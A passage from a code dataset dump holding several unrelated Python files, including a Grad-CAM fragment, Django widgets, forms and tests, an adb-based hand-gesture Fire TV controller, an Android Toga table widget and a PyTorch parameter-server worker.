num == 0:\r\n# color.append(['r','k'])\r\n# if num == 1:\r\n# color.append(['k','r'])\r\n\r\n \r\n# #output from the conv net and not from the pooling... \r\n \r\n \r\n# img_output = model.layers[0].layers[-1].output[:,num]\r\n# last_conv_layer = model.layers[0].get_layer('block5_conv3')\r\n \r\n# grads = K.gradients(img_output, last_conv_layer.output)[0]\r\n# pooled_grads = K.mean(grads, axis= (0,1,2))\r\n# # pooled_grads = K.mean(grads, axis= (0,1,2))\r\n \r\n# iterate = K.function([ model.layers[0].layers[0].input],\r\n# [pooled_grads, last_conv_layer.output[0]])\r\n \r\n# pooled_grads_value , conv_layer_output_value = iterate([x])\r\n \r\n# for j in range(512):\r\n# conv_layer_output_value[:,:,j] *= pooled_grads_value[j]\r\n \r\n \r\n \r\n# heatmap = np.mean(conv_layer_output_value , axis=-1)\r\n# heatmap = np.maximum(heatmap,0)\r\n# heatmap /= np.max(heatmap)\r\n \r\n# img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n\r\n \r\n# heatmap = cv2.resize(heatmap, (img.size[1],img.size[0]))\r\n# heatmap = np.uint8(255 * heatmap)\r\n# heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_HOT)\r\n# heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB)\r\n\r\n# img *= np.uint8(255.0/max(max(img.getextrema())))\r\n\r\n# blend = cv2.addWeighted(img,0.5, heatmap,0.5, 0)\r\n# heatmaps.append(blend)\r\n \r\n\r\n\r\n# # for h in heatmaps:\r\n# # fig, ax = plt.subplots()\r\n# # plt.axis('off')\r\n# # im = ax.imshow(h,interpolation='lanczos',cmap='hot')\r\n# # divider = make_axes_locatable(ax)\r\n# # cax = divider.append_axes(\"right\", size=\"5%\", pad=0.25) \r\n \r\n# # range_b = [blend.min(), np.mean([h.max(),h.min()]), h.max()]\r\n \r\n# # cbar = fig.colorbar(im, cax=cax, ticks=range_b, orientation='vertical')\r\n# # cbar.ax.set_yticklabels(['Low', 'Medium', 'High'], fontdict={'fontsize': 18, 'fontweight': 'medium'}) # horizontal colorbar\r\n\r\n# w,h,c=heatmaps[0].shape\r\n# itera = int(division)+1\r\n# final_heat = np.zeros(shape=(w*itera,h*itera,c))\r\n\r\n# for i in range(itera):\r\n# for j in range(itera): \r\n# final_heat[i*w:(i+1)*w,j*h:(j+1)*h,:] = heatmaps[i*itera+j]\r\n \r\n# # final_heat = final_heat//final_heat.max()\r\n# plt.imshow(final_heat/final_heat.max())\r\n \r\n \r\n\r\n\r\n","sub_path":"find_max_sized_image_v03.py","file_name":"find_max_sized_image_v03.py","file_ext":"py","file_size_in_byte":19203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616193763","text":"import csv\n\ndef calculateAvgHwy(file_path):\n output = {}\n with open(file_path, 'rb') as csvfile:\n lines = [row for row in csv.reader(csvfile, delimiter=',')]\n\n for y in set([str(i[11]) for i in lines[1:]]): # Itereate over vehicle class and set them\n val = [int(x[9]) for x in lines[1:] if x[11] == y] # val = hwy mpg of given vehicle class\n output[y] = sum(val) / float(len(val)) # avg of mpg for given vehicle class\n\n return output\n\n\n\ncalculateAvgHwy('./files/mpg.csv')\n","sub_path":"hwy_mpg.py","file_name":"hwy_mpg.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363262838","text":"from django.forms import Textarea\n\n\nclass RedactorTextarea(Textarea):\n class Media:\n css = {'all': ('redactor/redactor.css',)}\n js = (\n 'animal3/jquery-1.9.1.min.js',\n 'redactor/redactor.js', 'redactor/setup.js')\n\n def __init__(self, attrs=None, **kwargs):\n class_name = attrs.get('class', '')\n redactor_class = class_name and \" redactor\" or \"redactor\"\n 
class_name += redactor_class\n attrs['class'] = class_name\n super(RedactorTextarea, self).__init__(attrs)\n\n def render(self, name, value, attrs=None):\n return super(RedactorTextarea, self).render(name, value, attrs)\n","sub_path":"source/catalogue/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25494041","text":"import math\nimport typing\n\n\ndef draw_rectangle(\n ctx,\n x: int,\n y: int,\n width: int,\n height: int,\n border_radius: int,\n border_size: int,\n color: list[int],\n border_color: list[int] | None,\n) -> None:\n ctx.set_source_rgba(color[0] / 255, color[1] / 255, color[2] / 255, color[3])\n if border_radius > 0:\n corner_radius = border_radius\n\n radius = corner_radius\n degrees = math.pi / 180.0\n\n ctx.new_sub_path()\n ctx.arc(x + width - radius, y + radius, radius, -90 * degrees, 0 * degrees)\n ctx.arc(\n x + width - radius, y + height - radius, radius, 0 * degrees, 90 * degrees\n )\n ctx.arc(x + radius, y + height - radius, radius, 90 * degrees, 180 * degrees)\n ctx.arc(x + radius, y + radius, radius, 180 * degrees, 270 * degrees)\n ctx.close_path()\n\n ctx.fill_preserve()\n if border_size != 0:\n ctx.set_source_rgba(\n border_color[0] / 255,\n border_color[1] / 255,\n border_color[2] / 255,\n border_color[3],\n )\n ctx.set_line_width(border_size)\n ctx.stroke()\n else:\n ctx.rectangle(x, y, width, height)\n if border_size != 0:\n ctx.fill_preserve()\n ctx.set_source_rgba(\n border_color[0] / 255,\n border_color[1] / 255,\n border_color[2] / 255,\n border_color[3],\n )\n ctx.set_line_width(border_size)\n ctx.stroke()\n else:\n ctx.fill()\n return None\n","sub_path":"dot_config/i3/xborder/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"380110634","text":"import cv2 as cv\r\nimport numpy as np\r\nimport HandtrackingModule as Handtrack\r\nimport time\r\nimport subprocess\r\nimport PySimpleGUI as sg\r\nimport math\r\n\r\ndef rescale_frame(frame, percent=75):\r\n width = int(frame.shape[1] * percent/ 100)\r\n height = int(frame.shape[0] * percent/ 100)\r\n dim = (width, height)\r\n return cv.resize(frame, dim, interpolation =cv.INTER_AREA)\r\n\r\n#====================================================================================\r\n\r\ndef my_main():\r\n ExecuteThisAdb(\"adb disconnect\")\r\n ExecuteThisAdb(\"adb connect 192.168.43.6:5555\")\r\n\r\ndef UP():\r\n ExecuteThisAdb(\"adb shell input keyevent 19\")\r\n\r\ndef DOWN():\r\n ExecuteThisAdb(\"adb shell input keyevent 20\")\r\n\r\ndef LEFT():\r\n ExecuteThisAdb(\"adb shell input keyevent 21\")\r\n\r\ndef RIGHT():\r\n ExecuteThisAdb(\"adb shell input keyevent 22\")\r\n\r\ndef ExecuteThisAdb(Code):\r\n cmd = subprocess.Popen(Code, stdout = subprocess.PIPE, stderr = None, shell=True)\r\n print(cmd.communicate()[0]) \r\n\r\n#====================================================================================\r\n\r\nwidth, height = 1920,1080\r\n\r\nCapture = cv.VideoCapture(1)\r\nCapture.set(3,width)\r\nCapture.set(4,height)\r\n\r\npTime = 0\r\n\r\ndetector = Handtrack.handDetector(detectionCon=0.1)\r\n\r\nleft_rect_coord = []\r\nright_rect_coord = []\r\nup_rect_coord = []\r\ndown_rect_coord = []\r\n\r\n\r\nfor i in range(0, 200):\r\n for j in range(400,880):\r\n left_rect_coord.append((i,j))\r\n\r\nfor i in range(1520,1920):\r\n for j in range(200,880):\r\n 
right_rect_coord.append((i,j))\r\n\r\nfor i in range(410,1510):\r\n for j in range(0,250):\r\n up_rect_coord.append((i,j))\r\n\r\nfor i in range(410, 1510):\r\n for j in range(830,1080):\r\n down_rect_coord.append((i,j))\r\n\r\nmy_main()\r\n\r\nwhile True:\r\n \r\n success, frame = Capture.read()\r\n \r\n frame = detector.findHands(frame)\r\n #Draw Rectangles\r\n \r\n #left triangle\r\n cv.rectangle(frame, (0, 200), (400,880), (0,255,0), 1)\r\n \r\n #right triangle\r\n cv.rectangle(frame, (1520,200), (1920,880), (0,255,0), 1)\r\n \r\n #up triangle\r\n cv.rectangle(frame, (410,0), (1510,250), (0,255,0), 1)\r\n\r\n #down traingle\r\n cv.rectangle(frame, (410, 830), (1510,1080), (0,255,0), 1)\r\n\r\n\r\n list_of_positions = detector.findPosition(frame, draw=False)\r\n \r\n if len(list_of_positions) > 20:\r\n thumb = [list_of_positions[4][1], list_of_positions[4][2]]\r\n first_finger = (list_of_positions[8][1], list_of_positions[8][2])\r\n second_finger = (list_of_positions[12][1], list_of_positions[12][2])\r\n third_finger = (list_of_positions[16][1], list_of_positions[16][2])\r\n fourth_finger = (list_of_positions[20][1], list_of_positions[20][2])\r\n\r\n cv.circle(frame, (thumb[0],thumb[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (first_finger[0],first_finger[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (second_finger[0],second_finger[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (third_finger[0],third_finger[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (fourth_finger[0],fourth_finger[1]), 15, (255,0,255), cv.FILLED)\r\n\r\n \r\n if first_finger in left_rect_coord:\r\n LEFT()\r\n\r\n if second_finger in right_rect_coord:\r\n RIGHT()\r\n\r\n if third_finger in up_rect_coord:\r\n UP()\r\n\r\n if fourth_finger in down_rect_coord:\r\n DOWN()\r\n\r\n\r\n cTime = time.time()\r\n fps = 1/(pTime-cTime)\r\n pTime = cTime\r\n cv.putText(frame, f'FPS: {int(fps)}', (40,50), cv.FONT_HERSHEY_COMPLEX, 1, (255,0,0), 3)\r\n frame75 = rescale_frame(frame)\r\n cv.imshow(\"hand detection\", frame75) \r\n if cv.waitKey(20) & 0Xff==ord(' '):\r\n break\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","sub_path":"Control FireTV with Hand/MyTracking.py","file_name":"MyTracking.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"129624160","text":"from django.test import TestCase\nfrom django.test import Client\n\nimport os, zipfile\n\nfrom .models import SymbolsUpload\n\ndef get_test_file_path(file_name):\n dir = os.path.dirname(__file__)\n return os.path.join(dir, \"testdata/%s\" % (file_name))\n\nclass TestSimpleSymbolsUpload(TestCase):\n\n def test_symbols_upload_valid_zip(self):\n c = Client()\n comment = 'Test Comment'\n with open(get_test_file_path(\"valid.zip\")) as f:\n response = c.post('/upload/', {'symbols':f, 'comment': comment})\n self.assertEqual(response.status_code, 200)\n uploaded_symbols = SymbolsUpload.objects.all()\n self.assertEqual(len(uploaded_symbols), 1)\n uploaded_symbol = uploaded_symbols[0]\n self.assertEqual(uploaded_symbol.comment, comment)\n self.assertListEqual(uploaded_symbol.files.splitlines(), ['file1', 'file2'])\n\n def test_sybols_upload_invalid_zip(self):\n c = Client()\n with open(get_test_file_path(\"invalid.zip\")) as f:\n with self.assertRaises(zipfile.BadZipfile):\n response = c.post('/upload/', {'symbols': f, 'comment': 'Test Comment'})\n\n def test_missing_comment(self):\n c = Client()\n with open(get_test_file_path(\"valid.zip\")) as f:\n response = 
c.post('/upload/', {'symbols':f})\n self.assertEqual(response.status_code, 405)\n\n def test_missing_file(self):\n c = Client()\n response = c.post('/upload/', {'comment': 'test comment'})\n self.assertEqual(response.status_code, 405)\n","sub_path":"django/crashreport/symbols/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272071409","text":"from travertino.size import at_least\n\nfrom ..libs.activity import MainActivity\nfrom ..libs.android import R__attr\nfrom ..libs.android.graphics import Typeface\nfrom ..libs.android.view import Gravity, OnClickListener, View__MeasureSpec\nfrom ..libs.android.widget import (\n HorizontalScrollView,\n LinearLayout,\n LinearLayout__LayoutParams,\n ScrollView,\n TableLayout,\n TableLayout__Layoutparams,\n TableRow,\n TableRow__Layoutparams,\n TextView,\n)\nfrom .base import Widget\n\n\nclass TogaOnClickListener(OnClickListener):\n def __init__(self, impl):\n super().__init__()\n self.impl = impl\n\n def onClick(self, view):\n tr_id = view.getId()\n row = self.impl.interface.data[tr_id]\n if self.impl.interface.multiple_select:\n if tr_id in self.impl.selection:\n self.impl.selection.pop(tr_id)\n view.setBackgroundColor(self.impl.color_unselected)\n else:\n self.impl.selection[tr_id] = row\n view.setBackgroundColor(self.impl.color_selected)\n else:\n self.impl.clear_selection()\n self.impl.selection[tr_id] = row\n view.setBackgroundColor(self.impl.color_selected)\n if self.impl.interface.on_select:\n self.impl.interface.on_select(self.impl.interface, row=row)\n\n\nclass Table(Widget):\n table_layout = None\n color_selected = None\n color_unselected = None\n selection = {}\n _deleted_column = None\n _font_impl = None\n\n def create(self):\n # get the selection color from the current theme\n current_theme = MainActivity.singletonThis.getApplication().getTheme()\n attrs = [R__attr.colorBackground, R__attr.colorControlHighlight]\n typed_array = current_theme.obtainStyledAttributes(attrs)\n self.color_unselected = typed_array.getColor(0, 0)\n self.color_selected = typed_array.getColor(1, 0)\n typed_array.recycle()\n\n parent = LinearLayout(self._native_activity)\n parent.setOrientation(LinearLayout.VERTICAL)\n parent_layout_params = LinearLayout__LayoutParams(\n LinearLayout__LayoutParams.MATCH_PARENT,\n LinearLayout__LayoutParams.MATCH_PARENT,\n )\n parent_layout_params.gravity = Gravity.TOP\n parent.setLayoutParams(parent_layout_params)\n vscroll_view = ScrollView(self._native_activity)\n # add vertical scroll view\n vscroll_view_layout_params = LinearLayout__LayoutParams(\n LinearLayout__LayoutParams.MATCH_PARENT,\n LinearLayout__LayoutParams.MATCH_PARENT,\n )\n vscroll_view_layout_params.gravity = Gravity.TOP\n self.table_layout = TableLayout(MainActivity.singletonThis)\n table_layout_params = TableLayout__Layoutparams(\n TableLayout__Layoutparams.MATCH_PARENT,\n TableLayout__Layoutparams.WRAP_CONTENT,\n )\n # add horizontal scroll view\n hscroll_view = HorizontalScrollView(self._native_activity)\n hscroll_view_layout_params = LinearLayout__LayoutParams(\n LinearLayout__LayoutParams.MATCH_PARENT,\n LinearLayout__LayoutParams.MATCH_PARENT,\n )\n hscroll_view_layout_params.gravity = Gravity.LEFT\n vscroll_view.addView(hscroll_view, hscroll_view_layout_params)\n\n # add table layout to scrollbox\n self.table_layout.setLayoutParams(table_layout_params)\n hscroll_view.addView(self.table_layout)\n # add scroll box to parent layout\n 
parent.addView(vscroll_view, vscroll_view_layout_params)\n self.native = parent\n if self.interface.data is not None:\n self.change_source(self.interface.data)\n\n def change_source(self, source):\n self.selection = {}\n self.table_layout.removeAllViews()\n if source is not None:\n self.table_layout.addView(self.create_table_header())\n for row_index in range(len(source)):\n table_row = self.create_table_row(row_index)\n self.table_layout.addView(table_row)\n self.table_layout.invalidate()\n\n def clear_selection(self):\n for i in range(self.table_layout.getChildCount()):\n row = self.table_layout.getChildAt(i)\n row.setBackgroundColor(self.color_unselected)\n self.selection = {}\n\n def create_table_header(self):\n table_row = TableRow(MainActivity.singletonThis)\n table_row_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n table_row.setLayoutParams(table_row_params)\n for col_index in range(len(self.interface._accessors)):\n if self.interface._accessors[col_index] == self._deleted_column:\n continue\n text_view = TextView(MainActivity.singletonThis)\n text_view.setText(self.interface.headings[col_index])\n if self._font_impl:\n self._font_impl.apply(\n text_view, text_view.getTextSize(), text_view.getTypeface()\n )\n text_view.setTypeface(\n Typeface.create(\n text_view.getTypeface(),\n text_view.getTypeface().getStyle() | Typeface.BOLD,\n )\n )\n text_view_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n text_view_params.setMargins(10, 5, 10, 5) # left, top, right, bottom\n text_view_params.gravity = Gravity.START\n text_view.setLayoutParams(text_view_params)\n table_row.addView(text_view)\n return table_row\n\n def create_table_row(self, row_index):\n table_row = TableRow(MainActivity.singletonThis)\n table_row_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n table_row.setLayoutParams(table_row_params)\n table_row.setClickable(True)\n table_row.setOnClickListener(TogaOnClickListener(impl=self))\n table_row.setId(row_index)\n for col_index in range(len(self.interface._accessors)):\n if self.interface._accessors[col_index] == self._deleted_column:\n continue\n text_view = TextView(MainActivity.singletonThis)\n text_view.setText(self.get_data_value(row_index, col_index))\n if self._font_impl:\n self._font_impl.apply(\n text_view, text_view.getTextSize(), text_view.getTypeface()\n )\n text_view_params = TableRow__Layoutparams(\n TableRow__Layoutparams.MATCH_PARENT, TableRow__Layoutparams.WRAP_CONTENT\n )\n text_view_params.setMargins(10, 5, 10, 5) # left, top, right, bottom\n text_view_params.gravity = Gravity.START\n text_view.setLayoutParams(text_view_params)\n table_row.addView(text_view)\n return table_row\n\n def get_data_value(self, row_index, col_index):\n if self.interface.data is None or self.interface._accessors is None:\n return None\n row_object = self.interface.data[row_index]\n value = getattr(\n row_object,\n self.interface._accessors[col_index],\n self.interface.missing_value,\n )\n return value\n\n def get_selection(self):\n selection = []\n for row_index in range(len(self.interface.data)):\n if row_index in self.selection:\n selection.append(self.selection[row_index])\n if len(selection) == 0:\n selection = None\n elif not self.interface.multiple_select:\n selection = selection[0]\n return selection\n\n # data listener method\n def insert(self, index, item):\n 
self.change_source(self.interface.data)\n\n # data listener method\n def clear(self):\n self.change_source(self.interface.data)\n\n def change(self, item):\n self.interface.factory.not_implemented(\"Table.change()\")\n\n # data listener method\n def remove(self, item, index):\n self.change_source(self.interface.data)\n\n def scroll_to_row(self, row):\n pass\n\n def set_on_select(self, handler):\n pass\n\n def set_on_double_click(self, handler):\n self.interface.factory.not_implemented(\"Table.set_on_double_click()\")\n\n def add_column(self, heading, accessor):\n self.change_source(self.interface.data)\n\n def remove_column(self, accessor):\n self._deleted_column = accessor\n self.change_source(self.interface.data)\n self._deleted_column = None\n\n def set_font(self, font):\n self._font_impl = font._impl\n if self.interface.data is not None:\n self.change_source(self.interface.data)\n\n def rehint(self):\n self.native.measure(\n View__MeasureSpec.UNSPECIFIED,\n View__MeasureSpec.UNSPECIFIED,\n )\n self.interface.intrinsic.width = at_least(self.native.getMeasuredWidth())\n self.interface.intrinsic.height = at_least(self.native.getMeasuredHeight())\n","sub_path":"android/src/toga_android/widgets/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":9190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"252781670","text":"import asyncio\nimport multiprocessing\nfrom .util import deepcopy_model, timeit_recorder, TensorsSynchronizer, SingleThreadExecutor\nfrom .ps_config import WorkerMode, Config\nfrom .import_util import libtorch_embedding\nimport torch\nimport itertools\nfrom functools import lru_cache\nimport os\nimport signal\n\n\n@timeit_recorder.timeit('Worker[sync_grad_parameter_names]')\n@lru_cache(maxsize=None)\ndef sync_grad_parameter_names(parameter_names, model):\n cur_param_names = [name for name, p in model.named_parameters() if p.grad is not None]\n if parameter_names != cur_param_names:\n while parameter_names:\n parameter_names.pop()\n if not parameter_names:\n parameter_names.extend(cur_param_names)\n\n\ndef calc_process(model, sync_model, loss, forward_synchronizer, backward_synchronizer, targets_synchronizer, loss_synchronizer,\n prediction_synchronizer, rank, parameter_names):\n setattr(model, 'forward', model.sync_forward)\n\n def sync_handle(*args, **kwargs):\n \"\"\"\n This signal handle calls before forward_sync.send method. 
Hence, we won't start processing minibatch until\n model synchronization finishes\n \"\"\"\n model.load_state_dict(sync_model.state_dict())\n\n signal.signal(signal.SIGUSR2, sync_handle)\n\n # disable threads in synchronizers because we already work in separate process\n for x in (forward_synchronizer, backward_synchronizer, targets_synchronizer, loss_synchronizer, prediction_synchronizer):\n x.threaded = False\n\n try:\n while True:\n async_tensors, y = forward_synchronizer.recv_nowait(), targets_synchronizer.recv_nowait()\n model.zero_grad()\n async_tensors = (async_tensors, ) if not isinstance(async_tensors, tuple) else async_tensors\n for t in async_tensors:\n t.requires_grad = True\n if t.grad is not None:\n t.grad.zero_()\n if Config.worker_mode == WorkerMode.TRAIN:\n predictions = model(*async_tensors).squeeze()\n output = loss(predictions, y)\n output.backward()\n\n partial_gradients = [p.grad for p in itertools.chain(model.parameters(), async_tensors) if p.grad is not None]\n sync_grad_parameter_names(parameter_names, model)\n\n backward_synchronizer.send_nowait(*partial_gradients)\n loss_synchronizer.send_nowait(output.data)\n elif Config.worker_mode == WorkerMode.EVALUATE:\n with torch.no_grad():\n predictions = model(*async_tensors).squeeze()\n output = loss(predictions, y)\n prediction_synchronizer.send(predictions)\n loss_synchronizer.send(output.data)\n else:\n raise ValueError(\"Unknown worker mode\")\n except:\n import traceback\n print(traceback.format_exc())\n raise\n\n\n@lru_cache(maxsize=None)\ndef pname_index(parameter_names):\n return {pname: i for i, pname in enumerate(parameter_names)}\n\n\n@timeit_recorder.coro_timeit('Worker[match_gradients_to_parameters]')\nasync def match_gradients_to_parameters(parameter_names, model, partial_gradients):\n idx = pname_index(parameter_names)\n for pname, p in model.named_parameters():\n if p.grad is None:\n p.grad = partial_gradients[idx[pname]]\n\n\nclass Worker:\n def __init__(self, sync_model, loss, rank, update_locker, predictions_queue, obj_count, server):\n self.server = server\n self.update_locker = update_locker\n self.predictions_queue = predictions_queue\n self.obj_count = obj_count\n manager = multiprocessing.Manager()\n self.parameter_names = manager.list()\n self.sync_model = sync_model\n self.model = deepcopy_model(sync_model)\n self.model.share_memory()\n self.meta_info = [0]\n self.rank = rank\n\n self.loss = loss\n # forward synchronizer is not threaded since we try to reach zero copy, so it iwll just use additional thread\n # switch overhead instead of speed up on copying\n self.forward_synchronizer = TensorsSynchronizer(threaded=False)\n # this is threaded, because we always do copying there\n self.target_synchronizer = TensorsSynchronizer(threaded=True)\n\n # receiver synchronizers are always non-threaded\n self.backward_synchronizer = TensorsSynchronizer(threaded=False)\n self.loss_synchronizer = TensorsSynchronizer(threaded=False)\n self.predictions_synchronizer = TensorsSynchronizer(threaded=False)\n\n self.proc = multiprocessing.Process(target=calc_process, args=(\n self.model, sync_model, self.loss, self.forward_synchronizer, self.backward_synchronizer, self.target_synchronizer,\n self.loss_synchronizer, self.predictions_synchronizer, rank, self.parameter_names))\n self.proc.start()\n\n self.__backward_gradients = None\n self.__forward_tensors = None\n\n self.forward_executor = SingleThreadExecutor(self.__calc_async_forward)\n self.backward_executor = SingleThreadExecutor(self.__calc_async_backward)\n\n 
self.loop = asyncio.get_event_loop()\n\n @timeit_recorder.timeit('Worker[async_backward]')\n def __calc_async_backward(self):\n self.model.async_backward(*self.__backward_gradients)\n\n @timeit_recorder.timeit('Worker[async_forward]')\n def __calc_async_forward(self):\n return self.model.async_forward(*self.__forward_tensors)\n\n @timeit_recorder.coro_timeit('Worker[calc_and_send_model]')\n async def _calc_and_send_model(self, batch):\n *X, y = batch\n self.__forward_tensors = X\n async_tensors = await self.loop.run_in_executor(self.forward_executor, lambda: True)\n async_tensors = (async_tensors,) if isinstance(async_tensors, torch.Tensor) else async_tensors\n\n fwd = asyncio.ensure_future(self.forward_synchronizer.coro_send_nowait(*async_tensors))\n tgt = asyncio.ensure_future(self.target_synchronizer.coro_send_nowait(y))\n\n await asyncio.wait([fwd, tgt])\n\n return async_tensors\n\n @timeit_recorder.timeit('Worker[sync_model]')\n def _sync_model(self):\n os.kill(self.proc.pid, signal.SIGUSR2)\n\n @timeit_recorder.coro_timeit('Worker[process_train_minibatch]')\n async def process_train_minibatch(self, rec):\n batch = self.model.parse_train_minibatch(rec)\n batch_size = len(list(batch)[-1])\n self._sync_model()\n\n async_tensors = await self._calc_and_send_model(batch)\n async_tensors = (async_tensors,) if isinstance(async_tensors, torch.Tensor) else async_tensors\n\n bwd = asyncio.ensure_future(self.backward_synchronizer.coro_recv_nowait())\n ls = asyncio.ensure_future(self.loss_synchronizer.coro_recv_nowait())\n\n await asyncio.wait([bwd, ls])\n\n partial_gradients = bwd.result()\n cur_loss = ls.result()\n\n partial_gradients = (partial_gradients,) if not isinstance(partial_gradients, tuple) else partial_gradients\n self.__backward_gradients = partial_gradients[- len(async_tensors):]\n await self.loop.run_in_executor(self.backward_executor, lambda: True)\n await match_gradients_to_parameters(self.parameter_names, self.model,\n partial_gradients[:-len(async_tensors)])\n self.obj_count += batch_size\n return self.clone_model_gradients(), tuple(self.meta_info), float(cur_loss) / batch_size\n\n @timeit_recorder.coro_timeit('Worker[process_train_with_update]')\n async def process_train_with_update(self, batch):\n grad, meta_info, cur_loss = await self.process_train_minibatch(batch)\n await self.server.schedule(grad, meta_info)\n return cur_loss\n\n @timeit_recorder.coro_timeit('Worker[process_evaluation]')\n async def process_evaluation_minibatch(self, rec):\n key, *batch = self.model.parse_evaluation_minibatch(rec)\n batch_size = len(list(batch)[-1])\n await self._calc_and_send_model(batch)\n predictions = await self.predictions_synchronizer.coro_recv()\n cur_loss = await self.loss_synchronizer.coro_recv()\n self.obj_count += batch_size\n return key, libtorch_embedding.clone_tensor(predictions), float(cur_loss) / batch_size\n\n def shutdown(self):\n os.kill(self.proc.pid, signal.SIGINT)\n self.proc.join()\n\n @timeit_recorder.timeit('Worker[clone_gradients]')\n def clone_model_gradients(self):\n return list(libtorch_embedding.clone_tensor(x.grad) if isinstance(x.grad, torch.Tensor) else x.grad\n for x in self.model.parameters())\n","sub_path":"torch_ps/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":8692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"568940466","text":"from django.forms import ChoiceField\nfrom django.forms import DateField\nfrom django.forms import ModelChoiceField\nfrom django.forms import 
ModelForm\nfrom django.forms import TimeField\n\nfrom company.models import Employee\nfrom models import Interview\n\n\nclass InterviewForm(ModelForm):\n interview_date = DateField(input_formats=['%m/%d/%Y', ])\n start_time = TimeField(input_formats=['%I:%M%p'])\n end_time = TimeField(input_formats=['%I:%M%p'])\n class Meta:\n model = Interview\n fields = (\n 'case',\n 'category',\n 'interviewer',\n 'interview_date',\n 'start_time',\n 'end_time')\n\n def __init__(self, *args, **kwargs):\n eid = kwargs.pop('eid', '')\n super(InterviewForm, self).__init__(*args, **kwargs)\n if not eid:\n return\n cid = Employee.objects.get(pk=eid).company.id\n if not cid:\n return\n self.fields['interviewer'] = ModelChoiceField(\n queryset=Employee.objects.filter(company=cid, role__name='Interviewer'),\n empty_label=\"Select an interviewer\")\n\n","sub_path":"interview_track/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"319413555","text":"\n\nimport pandas as pd\n\ndict_df_output = {}\n\ndf_input = pd.read_csv(\"test\", sep='\\t', dtype=str, engine='python')\nlist_commonMarker = [\"D3S1358\", \"vWA\", \"D16S539\", \"CSF1PO\", \"TPOX\", \"AMEL\",\n \"D8S1179\", \"D21S11\", \"D18S51\", \"DYS391\", \"D2S441\", \"D19S433\", \"TH01\",\n \"FGA\", \"D22S1045\", \"D5S818\", \"D13S317\", \"D7S820\", \"D10S1248\",\n \"D1S1656\", \"D12S391\", \"D2S1338\"]\n\ntest_sample = ['2019-D-1144-01', '2019-D-1155-05']\n\ndf_input['Processed'] = df_input.filter(regex=r'Allele', axis = 1).apply(lambda x : set(x.dropna().values.tolist()),axis=1)\ndf_input = df_input[df_input['Sample Name'].isin(test_sample)][['Sample Name', 'Marker', 'Processed', 'Tag']]\n\n\n\nfor sample in test_sample:\n # df 초기화\n df_temp = pd.DataFrame({}, index = list_commonMarker)\n\n\n df_test = df_input[df_input['Sample Name']==sample]\n tag = df_test['Tag'].unique()\n list_count = []\n for index in range(len(tag)):\n list_count.append([])\n\n\n\n test_gb = df_test.groupby('Marker')\n\n for marker, group in test_gb:\n list_count = []\n list_concat = []\n for each in list(group['Processed']):\n list_count.append([])\n list_concat.extend(each)\n\n union = set.union(*group['Processed'])\n intersection = set.intersection(*group['Processed'])\n\n for member in union:\n count = list_concat.count(member)\n list_count[count-1].append(member)\n\n print(\"list_concat : \")\n print(list_concat)\n print(\"union : \")\n print(union)\n print(\"intersection : \")\n print(intersection)\n print(\"list count : \")\n print(list_count)\n\n df_temp = df_temp.append(pd.DataFrame([[marker, union, intersection, list_count,]], columns=['Marker', 'Union', 'Intersection', 'Count'].extend(tag)))\n\n\n\n\n","sub_path":"CaseReplicateReviewer/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275212779","text":"import numpy as np \nfrom enum import IntEnum\nimport torch\nimport torch.nn as nn\nfrom neuct.models import MultiLayerPerceptron\n\n\nclass CouplingLayer(nn.Module):\n \"\"\"Affine coupling layer in RealNVP.\n\n Args:\n dim (int): Dimension of input.\n mask (torch.tensor): Mask of arrays. \n activations (dict) : List of activation in s,t.\n s_t_net (nn.ModuleDict) : Container of MLP. 
